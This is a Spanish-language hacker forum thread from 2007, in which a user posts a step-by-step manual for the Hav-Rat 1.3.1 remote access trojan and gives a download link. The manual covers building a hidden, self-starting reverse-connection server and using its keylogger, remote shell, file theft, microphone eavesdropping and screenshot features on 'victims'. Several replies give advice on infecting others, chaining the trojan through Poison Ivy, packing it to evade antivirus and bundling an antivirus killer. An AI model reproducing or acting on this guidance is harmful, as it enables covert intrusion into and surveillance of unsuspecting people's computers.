hackers! Bienvenido(a), Visitante. Por favor, ingresa o regístrate.
¿Perdiste tu email de activación?
18 de Marzo de 2010, 05:36:14
Inicio Buscar Ayuda Ingresar Registrarse
Noticias: Privacidad - ¿Necesitas que se depure cierta informacion en nuestro portal? > leer aqui
Gracias gente :
Ecuador!Guatemala!!UruguayBrasilRepublica DominicanaBolivia *USAColombia!ESPAÑA!Venezuela!Chile **El Peru!ArgentinaMexico
+  Foros pOrtal Hacker
|-+  Hacktivismo
| |-+  Troyanos y Virus (Moderadores: ANTRAX, SolanGe)
| | |-+  Manual Hav-Rat 1.3.1 [CONEXION INVERSA] [BUENO] Dudas para este Troyano [SuiKo]
Páginas: [1] 2 3 4 5 Ir Abajo Imprimir
Autor Tema: Manual Hav-Rat 1.3.1 [CONEXION INVERSA] [BUENO] Dudas para este Troyano [SuiKo]  (Leído 6696 veces)
Que buscas?..
Suikodenman
Si te metes con CPH
te metes conmigo
Desconectado Desconectado

Hmmm...

Ver Perfil WWW
« : 18 de Junio de 2007, 02:41:31 »

Autor: Suikodenman
Web del Autor: http://www.inmortalsecurity.com
Respetar los Derechos de Autor manteniendo esta cabecera del tutorial si lo pegas en otro sitio.

Hola Chicos, Bienvenidos a este manual completo del HAV-RATE version 1.3.1 , la verdad es que yo creo que este troyano
es muy bueno! , solo pruebenlo y miren sus opciones, la conexion es muy rapida mas que en poison-ivy, ademas tiene muchas opciones
divertidas y buenas, skins y mucho mas. Saludos, cualquier duda postearla en este tema y no crear otro nuevo.

Queda totalmente prohibido la exhibicion de este manual en cualquier medio, sin antes el previo permiso del autor.

AVISO IMPORTANTE: Si tu proposito es pasar una victima desde otro troyano a este lee esto, si no no servira.
http://foro.portalhacker.net/index.php/topic,40147.0.html

BY:

SUIKODENMAN 2007©

DESCARGA HAV-RAT 1.3.1
http://rapidshare.com/files/104267832/HR1.3.1.rar

Bueno comenzemos el manual, despues de haber descargado el troyano, procederemos a descomprimirlo en cualquier carpeta vacia,o creas una nueva
da igual la cosa es que tengamos una carpeta sola para nuestro troyano, ya yo lo descomprimi. Despues de la descompresion
procedamos a abrir nuestro troyano

Comenzemos describiendo

****SOLAPA USERS ONLINE*****

-Cuando tenemos una conexion nos aparecera nuestra victima en la tabla.
nada podremos hacer en esta pantalla mientras no tengamos una victima.

procedamos a crear nuestro server.

***SOLAPA CREATE NEW SERVER***

-DNS: en este cuadro de texto procedamos a poner nuestro dominio no-ip. O nuestra ip en este caso puce mi dominio
prueba de no-ip como vemos a continuacion

-CLIENT PORT: es el puerto que la victima usara  para conectarse a nosotros . Recomiendo poner el mismo que esta puesto
en la configuracion del manual.

-TRANSFER PORT: es el puerto que usaremos nosotros para recibir las conexiones y mandar ordenes al server. Igual
recomiendo poner el mismo del manual.

-Botton Randon: este boton sirve para elegir un puerto cliente y transfer al azar, todos los que elijan funcionaran
correctamente , pero vuelvo a repetir que pongan el que puce yo.

-SERVER PASSWORD: es el pass de la conexion del server al cliente, si yo pongo admin (que es el predeterminado)
, debere poner el mismo password configurado en la solapa settings para poder recibir la conexion, en caso
de que las dos pass sean diferentes y una nueva victima intente conectarse aparecera una alerta.

-PASSWORD REMINDER: Si aparecio la alerta de password de conexion no concuerda pues esta nos recordara el password
que pusimos solo deberemos poner con que caracter comienza el pass, nos evitaremos problemas Cheesy

***INSTALATION***

-COPY TO: es el directorio donde se instalara el server al ser ejecutado, o si en la carpeta WINDOWS, O EN SYSTEM32
o en la carpeta ARCHIVOS DE PROGRAMA.

-AUTOSTART: configura el server para que inicie con windows.

-MELT: Si activamos esta casilla cuando el server sea ejecutado, se eliminara automaticamente (sin embarco se
instalara).

***SERVER SETTINGS***

-SERVER ID: Nombre predeterminado de la victima cuando se conecte a ti , yo puce jaja la victima cuando se conecte
aparecera con ese nombre.

-SERVER NAME: Es el nombre que tendra el server al instalarse en la pc victima, recomiendo poner uno poco sospechoso.
AVISO: ESTE NOMBRE DEBERA TERMINAR EN .exe

***LISTO SOLO NOS QUEDA PONER CREATE SERVER***

***POSTERIORMENTE NOS VAMOS AL PANEL SETTINGS***

-CLIENT PORT SHOULD LISTEN: Debemos poner el puerto que el troyano esta escuchando en el cliente. (DEBEREMOS PONER
EL MISMO QUE CONFIGURAMOS PARA EL SERVER)

-TANSFER SERVER SHOULD LISTEN PORT: Debemos poner el puerto a escuchar de las transferencias (DEBEREMOS PONER
EL MISMO QUE CONFIGURAMOS PARA EL SERVER)

-ADMIN PASS: Pass que esta escuchando el troyano (deberemos poner la misma que pusimos cuando creamos el server

-HIDE PASSWORD: AL activar esta casilla la pass que pongamos aparecera en *****

***MISCELANIUS***

PRIMERA CASILLA: Al activarla, cuando se conecte una victima tirara una alerta como la del msn cuando alguien
se conecta.

SEGUNDA CASILLA: Tirara un pequeño error si estas usando firefox en ese momento notificandote que hay
una nueva conexion.

TERCERA CASILLA: Cuando haiga una nueva conexion tirara una alerta sonido.

CUARTA CASILLA: Al activarla si una conexion entra y las pass no coinciden tirara una alerta.

BUENO YA TERMINAMOS LA PRIMERA ETAPA QUE ES CONFIGURACION.

SOLO NOS QUEDA DAR CLIC A SAVE PARA QUE SE SALVEN LOS CAMBIOS

--------------------------------------

ya que creamos nuestro server y despues de mandarlo y ella lo ejecuto. ahora es nuestro turno de ver las opciones para verlas solo hay q

*al darle clic derecho sobre la victima

-CONNECT:
Muestra las opciones que da el troyano a darle doble clic a la victima

-COPY IP: Copia al portapapeles la ip de la victima.

-COPY USERNAME: Copia al portapapeles el username de la victima

-COPY PCNAME: Copia al portapapeles el nombre de la maquina victima

-COPY LAN IP: Copia al portapapeles el Lan ip de la victima.

-UNISTALL: desinstala la conexion con la victima para que no regrese mas.

-RESTART: Reinicia la conexion

*darle doble clic a la victima

A continuacion nos aparecera una ventana como esta

DESCRIBAMOS:

-PANEL INFORMATION: Nos muestra informacion basica sobre nuestra victima, para ver la informacion solo hay que dar con el clic
derecho y refrescar el menu.

-PANEL FILE MANAGUER: Nos muestra todos los archivos y particiones de la pc victima, nos permite ejecutarlos, borrarlos, descargarnoslos, para ver los discos duros o particiones.
solo hay que darle clic a "list drives"

-SOUND MANAGUER: Este increible panel nos permitira escuchar todo lo que escucha la victima, enviar nuestros sonidos a la victima, mandarle mensajes
de voz a la victima usando un microfono!! fenomenal.

-REMOTE SHELL: Esta opcion nos permitira ejecutar comandos usando el MS-DOS para usarla simplemente clic en botton active.

-PROCESS MANAGUER: Esta opcion nos permitira ver los procesos actualmente en uso en la pc victima y matarlos.

-PC CONTROL

Esta interesante y muy util recopilacion de utilidades , nos dejara con el ojo y la boca abiertas.

-SWAP MOUSE BOTTONS: Invierte los botones del mouse

-FIX MOUSE BOTTONS: Regresa los botones del mousee al estado normal

-RESTART PC: reinicia la pc victima

-ShutDown Pc: Apaga la pc victima

-Log Of usser: cierra la sesion actual del usuario.

-Send MessageBox: Envia un mensaje a tu victima con el texto que quieras.

-Hide clock: esconde el reloj

-Show Clock: muestra el reloj

-Open Url: abre una pagina de internet con la url especificada en el explorador predeterminado

-Script Managuer: Nos permitira ejecutar scripts en el pc victima de dos tipos .Bat y .html

-Hide Start: oculta el menu inicio

-Show Start: muestra de nuevo el menu inicio.

-Task Hide: Esconde totalmente la task bar.

-Task Show: Vuelve a mostrarla.

-Task Disable: congela y no permite usar mas el task bar.

-Task Enable: vuelve a permitirla.

-Disable Desktop: congela el escritorio y no permite que se use.

-Enable Desktop: vuelve a permitirlo.

-Hide destok icons: oculta todos los iconos del escritorio.

-Show destok icons: los vuelve a mostrar

-Open cd: abre el la unidad cd-rom de la victima

-Close cd: la cierra.

-PANEL SCREEN CAPTURE

Nos permite tomar capturas de pantalla de la pc victima.

-PANEL KEYLOGGER: Registra todas las pulsaciones del teclado de la victima.

« Última modificación: 02 de Abril de 2008, 04:19:53 por Suikodenman » En línea

Trayendo la Información directamente a tu cerebro
black8827
Me das tu IP?
*

Ver Perfil
« Respuesta #1 : 18 de Junio de 2007, 03:33:05 »

Excelente MAESTRO muy buenos tus manuales he seguido varios y mas k explicados

FELICIDADES
pitufooo
Me das tu IP?
*

Ver Perfil
« Respuesta #2 : 19 de Junio de 2007, 06:01:19 »

hola

Un manual estupendo.

Las victimas k tenemos con el pioson 2.3.0  s pueden utilizar con este, o solo m sirven para el pioson Huh

gracias

un saludo

sn0x.
Si te metes con CPH
te metes conmigo

Ver Perfil WWW
« Respuesta #3 : 19 de Junio de 2007, 06:08:44 »

las victimas las puedes tener infectadas con los dos troyanos o más,solo deves de crear el server del hav-rat lo haces indetectable y se lo subes con el poison ivy a cualquier carpeta y luego lo ejecutas y ya tienes las victimas en los dos xDDDDDDDDDDDD
RaYm0nD!
Me das tu IP?
*

Que mas da el color de su piel

Ver Perfil
« Respuesta #4 : 19 de Junio de 2007, 06:34:08 »

muy bueno el manual pero, cuando le doy a crear el server, me dice "server creado en ..." q es un lugar muy raro, y no lo encuentro, hay alguna manera de "moverlo y que te salga en el escritorio? gracias
sn0x.
Si te metes con CPH
te metes conmigo

Ver Perfil WWW
« Respuesta #5 : 19 de Junio de 2007, 06:36:19 »

el server lo puedes guardar donde quieras fijate bien antes de crearlo
Suikodenman
Si te metes con CPH
te metes conmigo

Hmmm...

Ver Perfil WWW
« Respuesta #6 : 19 de Junio de 2007, 11:27:26 »

muy bueno el manual pero, cuando le doy a crear el server, me dice "server creado en ..." q es un lugar muy raro, y no lo encuentro, hay alguna manera de "moverlo y que te salga en el escritorio? gracias

el server se guarda en la misma carpeta donde esta el cliente, si esta carpeta es zip o rar no se guardara.

oskarspol
Me das tu IP?
*

Ver Perfil
« Respuesta #7 : 19 de Junio de 2007, 11:43:25 »

Hola a todos en especial a los maestros de todo esto ,mi primera pregunta a este troyano es que no consigo conectar ni infectandome yo mismo .
He puesto los puertos que pone el manual e incloso he abierto los mismos puertos en mi router.Decir que el poison yvi me va pero solo la version 2.1 las demas no me conecta.

Creo que el problema que tengo es de puertos porque infectandome yo mismo no se porque no sale .haber si alguien me puede ayudar .

Por favor me gustaria hablar con algun maestro de alguna manera supongo que por msn pero esto no se si esta permitido.Si puede ser pondre en otro post mi msn

bueno saludos a todos
Suikodenman
Si te metes con CPH
te metes conmigo

Hmmm...

Ver Perfil WWW
« Respuesta #8 : 19 de Junio de 2007, 11:47:02 »

Hola a todos en especial a los maestros de todo esto ,mi primera pregunta a este troyano es que no consigo conectar ni infectandome yo mismo .
He puesto los puertos que pone el manual e incloso he abierto los mismos puertos en mi router.Decir que el poison yvi me va pero solo la version 2.1 las demas no me conecta.

Creo que el problema que tengo es de puertos porque infectandome yo mismo no se porque no sale .haber si alguien me puede ayudar .

Por favor me gustaria hablar con algun maestro de alguna manera supongo que por msn pero esto no se si esta permitido.Si puede ser pondre en otro post mi msn

bueno saludos a todos

dale a ramdon para que escoja otros puertos posteriormente lo pones igual en settings saludos.

oskarspol
Me das tu IP?
*

Ver Perfil
« Respuesta #9 : 19 de Junio de 2007, 12:04:32 »

Gracias por responder siukoman

Los pueretos elegidos por el ramdom tengo que abirlos en el router despues .

Oye para infectar a alguien con el poison seria posible porque tambien lo he intentado y parece que no me responde cuando lo ejecuto .cosa rara verdad.
Suikodenman
Si te metes con CPH
te metes conmigo

Hmmm...

Ver Perfil WWW
« Respuesta #10 : 19 de Junio de 2007, 12:06:16 »

Gracias por responder siukoman

Los pueretos elegidos por el ramdom tengo que abirlos en el router despues .

Oye para infectar a alguien con el poison seria posible porque tambien lo he intentado y parece que no me responde cuando lo ejecuto .cosa rara verdad.

no te responde el troyano cuando lo abres? se te tilda?

oskarspol
Me das tu IP?
*

Ver Perfil
« Respuesta #11 : 19 de Junio de 2007, 12:58:27 »

Nada amigo con el poison yvi le mando el server le dooy a ejecutar hiden y normal y nada no conecta creo que no se ejecuta
El posion ahora me esta dando algun problemita pero de conexion se me que da cortado pero vamos que va pa lante

Nada tio me infecto yo mismo y no me va .

« Última modificación: 19 de Junio de 2007, 01:05:36 por oskarspol » En línea
black8827
Me das tu IP?
*

Ver Perfil
« Respuesta #12 : 19 de Junio de 2007, 05:01:13 »

Checa que lo estes enpaquetando bien con el themida y el sfx compiler alomejor lo detecta el antivirus de tu victima yo lo compilo junto con el avkiller de suikodenman y me funciona excelente destruye el AV y se infecta.
coscia
Me das tu IP?
*

Ver Perfil
« Respuesta #13 : 19 de Junio de 2007, 06:32:20 »

hola queria saber si este sirve para conectarce desde un ciber hacia cualquier otro lado... y como¿?

-=FEDE=-
sn0x.
Si te metes con CPH
te metes conmigo

Ver Perfil WWW
« Respuesta #14 : 19 de Junio de 2007, 11:32:43 »

Nada amigo con el poison yvi le mando el server le dooy a ejecutar hiden y normal y nada no conecta creo que no se ejecuta
El posion ahora me esta dando algun problemita pero de conexion se me que da cortado pero vamos que va pa lante

Nada tio me infecto yo mismo y no me va .

para ejecutarlo darle doble click al server.exe en la pc victima asi se activa
Páginas: [1] 2 3 4 5 Ir Arriba Imprimir 
« anterior próximo »
Ir a:  

Ingresar con nombre de usuario, contraseña y duración de la sesión